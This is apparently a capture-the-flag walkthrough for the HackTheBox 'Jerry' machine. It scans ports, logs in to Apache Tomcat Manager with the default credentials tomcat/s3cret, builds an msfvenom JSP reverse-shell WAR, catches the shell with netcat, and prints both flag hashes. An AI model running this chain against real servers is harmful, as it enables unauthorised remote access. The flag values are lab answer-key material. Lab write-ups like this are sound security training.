1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.95 # 8080/tcp open http-proxy nmap -oN jerry -p8080 -sC -sV -v 10.10.10.95 # 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 # |_http-favicon: Apache Tomcat # | http-methods: # |_ Supported Methods: GET HEAD POST OPTIONS # |_http-server-header: Apache-Coyote/1.1 # |_http-title: Apache Tomcat/7.0.88
2. Enumerate Apache Tomcat service (port 8080)
[x] Click on Manager App
[x] 401 Unauthorized error without login credentials
<role rolename="manager-gui"/> <user username="tomcat" password="s3cret" roles="manager-gui"/>
[x] Try to login to Manager App again
[x] USERNAME: tomcat
[x] PASSWORD: s3cret
3. Exploit war file upload in Apache Tomcat
[x] Create jsp payload (shell.war) using msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=HTB_IPv4 LPORT=4444 -f war > shell.war # Payload size: 1098 bytes # Final size of war file: 1098 bytes
[x] Set-up local listener
nc -lvp 4444 # Listening on [unknown] (family 0, port 462652714)
[x] Upload shell.war and navigate to http://10.10.10.95:8080/shell
[x] Going back to the netcat listener
# C:\apache-tomcat-7.0.88> # cd .. # C:\> dir # 06/18/2018 10:31 PM <DIR> Users dir Users # 06/18/2018 10:31 PM <DIR> Administrator dir Users\Administrator # 06/19/2018 06:09 AM <DIR> Desktop dir Users\Administrator\Desktop # 06/19/2018 06:09 AM <DIR> flags dir Users\Administrator\Desktop\flags # 06/19/2018 06:11 AM 88 2 for the price of 1.txt type Users\Administrator\Desktop\flags\"2 for the price of 1.txt" # user.txt # 7004dbcef0f854e0fb401875f26ebd00 # # root.txt # 04a8b36e1545a455393d067e772fe90e
